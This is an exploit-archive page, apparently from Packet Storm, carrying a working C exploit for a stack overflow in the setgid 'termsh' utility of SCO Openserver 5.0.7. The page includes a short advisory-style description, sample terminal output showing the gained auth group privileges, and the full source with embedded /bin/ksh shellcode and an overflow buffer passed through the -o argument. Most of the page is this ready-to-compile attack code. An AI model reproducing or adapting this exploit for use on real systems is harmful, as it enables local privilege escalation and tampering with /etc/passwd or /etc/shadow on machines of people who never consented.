exploit the possibilities

prdelka-vs-SCO-termshx.c

prdelka-vs-SCO-termshx.c
Posted Oct 27, 2006
Authored by prdelka | Site prdelka.blackart.org.uk

SCO Openserver 5.0.7 termsh exploit. 'termsh' is a program to view or modify an existing terminal entry on SCO Openserver. A stack based overflow exists in the handling of command line arguments, namely the [-o oadir] argument. It is installed setgid auth in a default SCO Openserver 5.0.7 install. An attacker may use this flaw to gain write access to /etc/passwd or /etc/shadow allowing for local root compromise.

tags | exploit, overflow, local, root
MD5 | 54d689a2345b1a2e628537500f0f9df8

prdelka-vs-SCO-termshx.c

Change Mirror Download
/* SCO Openserver 5.0.7 termsh exploit
* ===================================
* 'termsh' is a program to view or modify an existing terminal entry on
* SCO Openserver. A stack based overflow exists in the handling of command
* line arguements, namely the [-o oadir] arguement. It is installed setgid
* auth in a default SCO Openserver 5.0.7 install. An attacker may use this
* flaw to gain write access to /etc/passwd or /etc/shadow allowing for
* local root compromise.
*
* Example use.
* $ id
* uid=200(user) gid=50(group) groups=50(group)
* $ uname -a
* SCO_SV scosysv 3.2 5.0.7 i386
* $ gcc prdelka-vs-SCO-termshx.c -o prdelka-vs-SCO-termshx
* $ ./prdelka-vs-SCO-termshx /opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh
* [ SCO Openserver 5.0.7 termsh local privilege escalation exploit
* $ id
* uid=200(user) gid=50(group) egid=21(auth) groups=50(group)
*
* - prdelka
*/
#include <stdio.h>
#include <stdlib.h>

char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
"\x68\xff\xf8\xff\x3c\x6a\x65\x89"
"\xe6\xf7\x56\x04\xf6\x16\x31\xc0"
"\x50\x68""/ksh""\x68""/bin""\x89"
"\xe3\x50\x50\x53\xb0\x3b\xff\xd6";

int main(int argc,char* argv[])
{
char* buffer;
char* arg = "-o";
char *env[] = {"HISTORY=/dev/null",NULL};
long eip,ptr;
int i;
printf("[ SCO Openserver 5.0.7 termsh local privilege escalation exploit\n");
if(argc < 2)
{
printf("[ Error : [path]\n[ Example: %s /opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh\n",argv[0]);
exit(0);
}
eip = 0xa2080853;
buffer = malloc(7449 + strlen(shellcode));
memset(buffer,'\x00',7449 + strlen(shellcode));
ptr = (long)buffer + strlen(shellcode);
strncpy(buffer,shellcode,strlen(shellcode));
for(i = 1;i <= 1862;i++)
{
memcpy((char*)ptr,(char*)&eip,4);
ptr = ptr + 4;
}
execle(argv[1],argv[1],arg,buffer,NULL,env);
exit(0);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    1 Files
  • 2
    Dec 2nd
    16 Files
  • 3
    Dec 3rd
    17 Files
  • 4
    Dec 4th
    23 Files
  • 5
    Dec 5th
    11 Files
  • 6
    Dec 6th
    10 Files
  • 7
    Dec 7th
    1 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    15 Files
  • 10
    Dec 10th
    30 Files
  • 11
    Dec 11th
    8 Files
  • 12
    Dec 12th
    20 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close